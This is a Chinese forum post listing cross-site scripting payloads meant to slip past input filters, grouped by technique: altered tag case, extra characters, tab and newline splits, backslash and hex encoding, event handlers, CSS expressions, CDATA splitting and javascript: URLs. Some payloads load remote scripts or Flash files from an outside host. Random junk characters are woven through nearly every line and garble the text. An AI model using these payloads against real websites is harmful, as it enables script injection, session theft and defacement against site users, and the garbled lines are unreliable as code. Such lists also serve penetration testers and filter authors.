1. 改变字符大小写6 B$ a5 A5 `4 D9 H6 W, a$ ?
# s% E- u% y# p+ C: G9 D0 F ( m; F0 p9 _0 |# n* w% a5 A
( ]! y; H6 k, X3 l <sCript>alert(‘d’)</scRipT>& Q$ u" Q9 s# M' o! g, g
1 g5 G* f9 B: P& @) i
2. 利用多加一些其它字符来规避Regular Expression的检查# Y. u3 }, w4 `2 a- k) Q$ ^5 B* U- H
( @* B2 J, l- e5 e# s <<script>alert(‘c’)//<</script>
0 S$ f- e8 H1 B5 \3 f W
5 W0 b. r9 ^0 @# u7 { <SCRIPT a=">" SRC="t.js"></SCRIPT>( [/ H9 T$ e {- C. r" U9 |- P
6 [ P, l' I9 \9 u7 M <SCRIPT =">" SRC="t.js"></SCRIPT>5 G9 ~! V1 H" t
/ g9 V) N4 R/ @8 C <SCRIPT a=">" ” SRC="t.js"></SCRIPT>6 }3 a1 ~ u# C+ P: ~6 g+ J! y* d
3 o5 {2 v; c# t2 q
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
$ G. W# y& c) Y3 q
; M1 @& I5 l* n3 q; C) D2 ?0 Q <SCRIPT a=`>` SRC="t.js"></SCRIPT>
/ p( k) ~+ k+ X1 d# A7 z- {" d5 T) h- j- Z$ l) M0 D! H1 J
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>
- B8 o A" \8 |; i
+ B6 _1 @ {: U3. 以其它扩展名取代.js
4 h6 Y, H Z. V
% b! J) f v; U. b <script src="bad.jpg"></script>
+ b6 m- K0 o) u% i3 K9 w. w! a6 o: O! t& F
4. 将Javascript写在CSS档里
f |6 H8 N+ M( W. ?
7 v9 J: t# c* A/ B6 k- a6 Z <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
5 O0 w7 R7 H5 x( ]7 K" C: \0 P/ Y% o
example:
8 r- o2 l0 M6 m/ R5 M2 k
" C) P) P7 d; g! M8 N body {( a- B+ K* ]! s2 _3 [1 B' V9 [
& D/ k% O8 y" F
background-image: url(‘javascript:alert("XSS");’)/ d" ^8 p3 X% s8 X& G
0 {1 J2 n9 W' i9 X: p- w }
$ C: l1 F% \) K# v" X$ }$ a" O6 j9 N% v7 I5 O4 B2 V
5. 在script的tag里加入一些其它字符' }% l. V/ |" G/ J+ T+ c& K
+ V% A4 Z7 ~3 b* F$ Q% f0 ~ <SCRIPT/SRC="t.js"></SCRIPT>' d# m( O0 n% f; }, a' k
- E# W7 y$ \0 q, k <SCRIPT/anyword SRC="t.js"></SCRIPT>
+ w+ T$ }3 m9 \% ]
t" H1 Z$ o* `% ]( K5 t6. 使用tab或是new line来规避( A) A7 T$ {' [) [6 Q6 n! g
/ m5 e: f( M3 v <img src="jav ascr ipt:alert(‘XSS3′)">+ S, _ d7 l4 Q. J9 ^
. S& Z2 F4 V9 ~5 m# ]4 I
<img src="jav ascr ipt:alert(‘XSS3′)"># g B* G. s F/ ]
; t: I [4 q: d: q
<IMG SRC="jav ascript:alert(‘XSS’);">3 X% l& o5 A; I8 }. \ W3 h3 B9 v
. l2 Z8 D! `9 s* j8 q+ y
-> tag
6 H# N* K/ ] F
S* V) A1 g( z/ i+ l/ E -> new line2 J" U( U0 p' |" t. U5 E+ X4 h# @
. n0 [" y) w, |! C- t
7. 使用"\"来规避/ r" Z4 I% j" I2 H4 U& ~) {
3 }/ F' Z% {- V7 H <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>, f$ B9 E h3 f" _0 i" B- u
# [2 `& D" @0 V5 b0 h- {' P/ I% v
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
5 D3 F6 ~& s% @$ S, R( R8 | Y2 Q" P/ i3 z$ r! X; c
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">, A# A9 p& q \% p" w5 p S1 M% R8 S9 ]
1 A% u) s" C5 Q9 N/ v& D <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">" j' _# J y) X0 L7 T. E( z
; M0 @% q+ q( l4 ~1 p7 Q+ _ <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
9 T o+ B4 i; S, g7 U
2 |/ q( r6 V4 O3 d: `% y8. 使用Hex encode来规避(也可能会把";"拿掉)
2 i* E+ r1 I \1 V. Z. M
" c: n: H0 y3 H% w <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
9 o% _$ H4 b, | k
6 \* w5 v+ `) Q' Z2 v8 @( Q& D 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
- N1 k( ?6 x; O' P; w2 J9 C; T6 ]) {! K5 ?
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">9 C; p# D! d$ R2 p
* i$ V0 M3 H" r0 d; F0 p: [
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);"># @9 `1 A+ ?0 D" C" R w
, T* N. f& j& G# |* x% {
9. script in HTML tag) u1 l D* i1 J
& V, s y8 W! ]7 ~+ \! v3 ?' s8 k% l" n
<body onload=」alert(‘onload’)」>. |6 m7 h# ]# \# m/ g0 y
, [" M; z7 Y6 |; Q4 G
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload9 D0 k' i! o# X, O
# [' V" p3 i1 a9 I+ \
10. 在swf里含有xss的code
' E2 t) x" g% t# G' E8 D( t" r
% D3 D# S! R- Y9 C- l y <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>, w/ L: V9 E- y
2 y$ |! M% u2 ^0 Q' c
11. 利用CDATA将xss的code拆开,再组合起来。) c8 D. o" N5 s) G
% j$ s+ a& Z5 F <XML ID=I><X><C>: b! ~; [$ k, Q5 X2 k+ H: M
) c7 n+ X" X4 Y& U# {5 J8 x) l
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
K2 F' X) r' g* G
. `/ @0 t2 m2 w2 x+ S( ~6 j </C></X>
( ?, I3 @0 `! @5 G4 n3 I* F S3 ]9 C6 x0 S* x* ]+ s. E
</xml>4 f3 ]) `3 @8 n5 ^7 `
, M8 {* Q; q, w+ M! q
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
: d# l, z* v& c% _8 k
0 g5 g/ W5 a8 |2 l% R0 Z2 d <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
- E, ^* M- d' i! `0 t
* {3 p8 P8 O v5 M! I) c: E <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>3 d( ]" P, N2 P o
9 |6 v4 ?; d9 t$ X/ E6 a' a7 \12. 利用HTML+TIME。
6 g8 [0 P, y* t& x% i& S" R# c$ {/ H4 f4 A6 P: q* X4 Y
<HTML><BODY>" M0 ?1 \, B1 k( F( j9 T
8 s+ N- @0 D! k( V$ z# z. q* H
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">* ?0 A4 D2 H1 F7 Q
" v: F! Q6 ]+ R- O% K' {
<?import namespace="t" implementation="#default#time2">" g$ y$ v6 v2 e
# Z7 B9 f$ w. E3 L% A/ O' o
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
" C1 R) \( _% I9 o* K& x9 J' j" i1 h( @% }) z# o& h
</BODY></HTML>" V2 u( q8 k8 ~9 C5 c% S" r, |' N
" \8 ^" z7 x X9 D3 ? Z0 S13. 透过META写入Cookie。; v4 G4 @8 N+ O8 w) @+ j4 S8 C
* Y% G- _$ u; I4 N) P) Z
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
* r( r8 t# I& d3 }$ l8 H+ _* x7 }- T7 X2 u: f. Z0 {1 H' s1 n7 @! P& o% Q
14. javascript in src , href , url
8 ^+ c3 k( W. f
' ^$ ^; C+ k: ?1 M. M( U9 K4 L <IFRAME SRC=javascript:alert(’13′)></IFRAME>) n! A" n7 H1 i
5 b6 H$ A% s1 N <img src="javascript:alert(‘XSS3′)">8 Q* k8 {4 T9 o6 x1 J$ E7 i
. U3 R" ^6 J; }2 Y
<IMG DYNSRC="javascript:alert(‘XSS20′)">
. F/ B6 \; I. z
& h, |1 C& |! T6 M! A' R: Z9 ^; |* U <IMG LOWSRC="javascript:alert(‘XSS21′)">7 ^8 E, g! {; W" J3 J- e( B2 F
) K4 |9 c( }" _) \# p6 L* ?
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">) }3 i9 c; `6 |2 u5 |( [/ |
6 [0 z; m! p8 }! _7 T: g1 [ <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
. d3 K! d1 H/ R9 X3 ^; O
: O+ r- z N+ q* W3 A6 z2 O <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
( |2 w/ c) [! t$ w3 {& V
1 X+ O& r9 d( u <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
$ V3 L% c, j; C1 F T
+ b# V7 ], q2 N+ b, f. [: V9 T <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}# y, G e" D* y* v. D. d* s% O
; K8 c. b3 _0 [0 t </STYLE><A CLASS=XSS></A>
8 F3 e+ T J0 t! p% ?8 X; {3 s& ~2 y& {9 s0 W
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>2 s" D2 N: z& S7 b* _
' G1 }3 v. c: I* O
|
发表于 2012-12-31 09:59:28
收藏
支持
反对